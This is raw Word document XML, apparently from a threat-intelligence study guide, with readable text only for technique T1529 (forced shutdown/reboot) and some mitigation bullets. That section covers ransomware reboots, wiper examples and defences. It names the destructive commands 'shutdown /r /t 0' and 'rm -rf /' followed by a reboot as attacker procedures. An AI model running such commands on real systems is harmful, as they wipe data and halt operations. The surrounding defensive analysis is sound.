    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00155378">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Enable Secure Boot and firmware write protection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00155378">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Block unsigned firmware updates via Group Policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="363"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="363"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>3) Technique: System Shutdown/Reboot (T1529)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="363"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00155378">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Forced shutdowns/reboots disrupt operations or aid in destructive attacks (e.g., wiping memory-resident malware traces).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00155378" w:rsidRDefault="00155378" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="363"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Key Procedure</w:t>
      </w:r>
      <w:r w:rsidR="00694159" w:rsidRPr="00155378">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00155378" w:rsidRDefault="00694159" w:rsidP="00155378">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00155378">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Ransomware-Triggered Reboots via shutdown /r /t 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00155378">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Malware reboots systems to encrypt files during startup (e.g., REvil’s "Safe Mode" encryption).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00155378">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00155378">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>BlackCat rebooted systems into WinPE to bypass disk encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00155378" w:rsidRDefault="00694159" w:rsidP="00155378">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00155378">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Bricking Systems with rm -rf / + reboot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00155378">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Linux malware deletes critical files (/bin, /sbin) before rebooting to prevent recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00155378">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00155378">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>APT34 deployed StoneDrill to wipe Middle Eastern energy servers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00155378">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00155378">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Restrict shutdown commands via endpoint security.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00694159" w:rsidRPr="00694159" w:rsidRDefault="00694159" w:rsidP="00155378">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00694159">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Deploy immutable backups for critical systems.</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00694159" w:rsidRPr="00694159" w:rsidSect="003F04D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6C3" w:rsidRDefault="00C876C3" w:rsidP="00886717">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00C876C3" w:rsidRDefault="00C876C3" w:rsidP="00886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6C3" w:rsidRDefault="00C876C3" w:rsidP="00886717">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00C876C3" w:rsidRDefault="00C876C3" w:rsidP="008867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1620"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1E92213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3E47E0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="237002D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D51F09"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9656D77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F27697"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B1EEA6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32492B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6672C18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466102"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B80295D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6B91519"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2F986488"/>
    <w:lvl w:ilvl="0" w:tplc="40090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1083" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="40090003">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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0CB119B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DB6C38C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E660B0E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="700270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0A650D1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4FACFBC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4ED73E4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="65A6F0C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6BD0C0A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="19065A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972722F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A2980B0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C46539A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FD8456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D1C7AD3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="73FAB3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0DD037D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EECA7D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17112BA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="493C0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9A2E79"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="94B0C52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E57568"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4B684076"/>
    <w:lvl w:ilvl="0" w:tplc="7578135E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="108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D30EAA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="84F87CE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A8E4DAF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F5A2ECDC"/>
    <w:lvl w:ilvl="0" w:tplc="7578135E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="147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21" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2D903BA6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1E061E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0A252C9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4310140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7E42BBF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="10142B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94D5ACD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="487085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9DA697D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="47B0A5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BAF49C2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A34653A2"/>
    <w:lvl w:ilvl="0" w:tplc="7578135E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="144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5671E2E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C0680122"/>
    <w:lvl w:ilvl="0" w:tplc="F050B5B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F537ED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5D2E408E"/>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29" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="57603C1C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5F1873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81D137E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0352E3C6"/>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A2D4C85"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B52267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FB271C2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F03A6EEA"/>
    <w:lvl w:ilvl="0" w:tplc="7578135E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="144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0AC7B33"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="409E7876"/>
    <w:lvl w:ilvl="0" w:tplc="40090003">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1117" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="61000069"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E67485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1A704D0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A9F24334"/>
    <w:lvl w:ilvl="0" w:tplc="77323BBE">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>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8B3273"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="27F4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D1FC8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DF4854C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6BC147C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FDF404F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8235047"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D9764746"/>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40" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="695704DE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EB6083B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A6E5A59"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C6B83298"/>
    <w:lvl w:ilvl="0" w:tplc="40090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1083" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="40090003">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42" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6AE64054"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4D424F5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DFC1C95"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="774AC5A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E587F48"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7450988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F002CCC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="881AE2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1BC0993"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E46493CE"/>
    <w:lvl w:ilvl="0" w:tplc="40090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1083" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="40090003">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47" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="723820FC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5568C8D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5395568"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="87987402"/>
    <w:lvl w:ilvl="0" w:tplc="40090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1083" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="40090003">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49" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7D6903BA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="71066AF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5"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="42">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="43">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="44">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="45">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="46">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="47">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="48">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="49">
    <w:abstractNumId w:val="41"/>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DF"/>
    <w:rsid w:val="00053C20"/>
    <w:rsid w:val="000B2497"/>
    <w:rsid w:val="000C34C7"/>
    <w:rsid w:val="00151F35"/>
    <w:rsid w:val="00155378"/>
    <w:rsid w:val="0016087A"/>
    <w:rsid w:val="00176A50"/>
    <w:rsid w:val="00204DBF"/>
    <w:rsid w:val="00264887"/>
    <w:rsid w:val="002E0B92"/>
    <w:rsid w:val="00303C97"/>
    <w:rsid w:val="00316B94"/>
    <w:rsid w:val="00357590"/>
    <w:rsid w:val="003F04DF"/>
    <w:rsid w:val="00421F47"/>
    <w:rsid w:val="004F3158"/>
    <w:rsid w:val="005458E8"/>
    <w:rsid w:val="00550119"/>
    <w:rsid w:val="005F3585"/>
    <w:rsid w:val="00694159"/>
    <w:rsid w:val="006947BE"/>
    <w:rsid w:val="00701072"/>
    <w:rsid w:val="00706A2A"/>
    <w:rsid w:val="00714B1A"/>
    <w:rsid w:val="0073177B"/>
    <w:rsid w:val="00773F95"/>
    <w:rsid w:val="007A1057"/>
    <w:rsid w:val="007A111E"/>
    <w:rsid w:val="007C303B"/>
    <w:rsid w:val="00823D78"/>
    <w:rsid w:val="00886717"/>
    <w:rsid w:val="008B486A"/>
    <w:rsid w:val="00950FDC"/>
    <w:rsid w:val="00983185"/>
    <w:rsid w:val="00984DC3"/>
    <w:rsid w:val="00A45289"/>
    <w:rsid w:val="00A5741B"/>
    <w:rsid w:val="00A6781E"/>
    <w:rsid w:val="00A74512"/>
    <w:rsid w:val="00A95CE9"/>
    <w:rsid w:val="00AF435F"/>
    <w:rsid w:val="00B52D87"/>
    <w:rsid w:val="00B66B0A"/>
    <w:rsid w:val="00C17302"/>
    <w:rsid w:val="00C177F6"/>
    <w:rsid w:val="00C66C5E"/>
    <w:rsid w:val="00C72EA3"/>
    <w:rsid w:val="00C876C3"/>
    <w:rsid w:val="00D4128B"/>
    <w:rsid w:val="00D62A00"/>
    <w:rsid w:val="00EC4980"/>
    <w:rsid w:val="00F34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663F1-2D0F-4EE8-A6EC-0B0A206D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78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831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781E"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00A6781E"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00A6781E"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A678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678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8318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867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717"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008867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803950">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="752287948">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
